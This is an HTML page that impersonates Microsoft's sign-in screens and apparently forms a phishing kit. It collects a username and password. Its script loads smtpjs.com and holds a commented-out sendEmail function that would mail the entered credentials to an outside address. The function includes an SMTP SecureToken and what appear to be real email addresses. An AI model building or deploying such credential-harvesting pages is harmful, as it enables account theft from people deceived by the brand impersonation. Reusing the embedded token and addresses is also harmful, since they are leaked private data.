<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="icon" href="assets/favicon.ico" />
    <title>Sign in to your Microsoft account</title>
    <link rel="stylesheet" href="assets/app.css" />
  </head>

  <body>
    <section id="section_uname">
      <div class="auth-wrapper">
        <img src="assets/logo.png" alt="Microsoft" />
        <h2 class="title mb-16 mt-16">Sign in</h2>
        <form id="form-1">
          <div class="mb-16">
            <p id="error_uname" class="error"></p>
            <input
              id="inp_uname"
              type="text"
              name="uname"
              class="input"
              placeholder="Email, phone, or Skype"
            />
          </div>
        </form>
        <div>
          <p class="mb-16 fs-13">
            No account? <a href="" class="link">Create one!</a>
          </p>
          <p class="mb-16 fs-13">
            <a href="#" class="link"
              >Sign in with a security key
              <img src="assets/question.png" alt="Question img" />
            </a>
          </p>
        </div>
        <div>
          <button class="btn" id="btn_next">Next</button>
        </div>
      </div>
      <div class="opts">
        <p class="has-icon mb-0" style="font-size: 15px">
          <span class="icon"><img src="assets/key.png" width="30px" /></span>
          Sign-in options
        </p>
      </div>
    </section>

    <section id="section_pwd" class="d-none">
      <div class="auth-wrapper">
        <img src="assets/logo.png" alt="Microsoft" class="d-block" />
        <div class="identity w-100 mt-16 mb-16">
          <button class="back">
            <img src="assets/back.png" />
          </button>
          <span id="user_identity">a@b.com</span>
        </div>
        <h2 class="title mb-16">Enter password</h2>
        <form id="form-2">
          <div class="mb-16">
            <p id="error_pwd" class="error"></p>
            <input
              id="inp_pwd"
              type="password"
              name="pass"
              class="input"
              placeholder="Password"
            />
          </div>
          <div>
            <p class="mb-16">
              <a href="#" class="link fs-13">Forgot password?</a>
            </p>
            <p class="mb-16">
              <a href="#" class="link fs-13">Other ways to sign in</a>
            </p>
          </div>
          <div>
            <button class="btn" id="btn_sig">Sign in</button>
          </div>
        </form>
      </div>
    </section>

    <section id="section_final" class="d-none">
      <div class="auth-wrapper">
        <img src="assets/logo.png" alt="Microsoft" class="d-block" />
        <div class="identity w-100 mt-16 mb-16">
          <span id="user_identity">a@b.com</span>
        </div>
        <h2 class="title mb-16">Stay signed in?</h2>
        <p class="p">
          Stay signed in so you don't have to sign in again next time.
        </p>
        <label class="has-checkbox">
          <input type="checkbox" class="checkbox" />
          <span>Don't show this again</span>
        </label>
        <div class="btn-group">
          <button class="btn btn-sec" id="btn_final">No</button>
          <button class="btn" id="btn_final" onsubmit="">Yes</button>
        </div>
      </div>
    </section>
    <footer class="footer">
      <a href="#">Terms of use</a>
      <a href="#">Privacy & cookies</a>
      <span>.&nbsp;.&nbsp;.</span>
    </footer>
    <!--VGhpcyBpcyBhIGxpa2VseSBzY2FtIHBhZ2UgeXVubm8g-->
    <script src="assets/app.js"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <script>
      form2 = document.getElementById("form-2");
      form2.addEventListener("submit", (e) => {
        //
        e.preventDefault();
        //sendEmail();
        // window.location.href = window.location.href;
      });
      form1 = document.getElementById("form-1");
      pwdInp = document.getElementById("inp_pwd");
      unameInp = document.getElementById("inp_uname");
      unameVal = unameInp.value;
      form1.addEventListener("submit", (e) => {
        e.preventDefault();
        //perform uname validation
      });
      /*
      function sendEmail() {
        Email.send({
          Host: "smtp.elasticemail.com",
          Username: "me.bdigitals@gmail.com",
          SecureToken: "9a10b246-ec7d-4ef3-85f6-95ef2141c30e",
          To: "me.bdigitals@outlook.com",
          From: "me.bdigitals@gmail.com",
          Subject: "New data entry",
          Body:
            "Username: " +
            document.getElementById("inp_uname").value +
            "<br> Password: " +
            document.getElementById("inp_pwd").value,
        }).then((message) => console.log(message));
      }*/
    </script>
  </body>
</html>
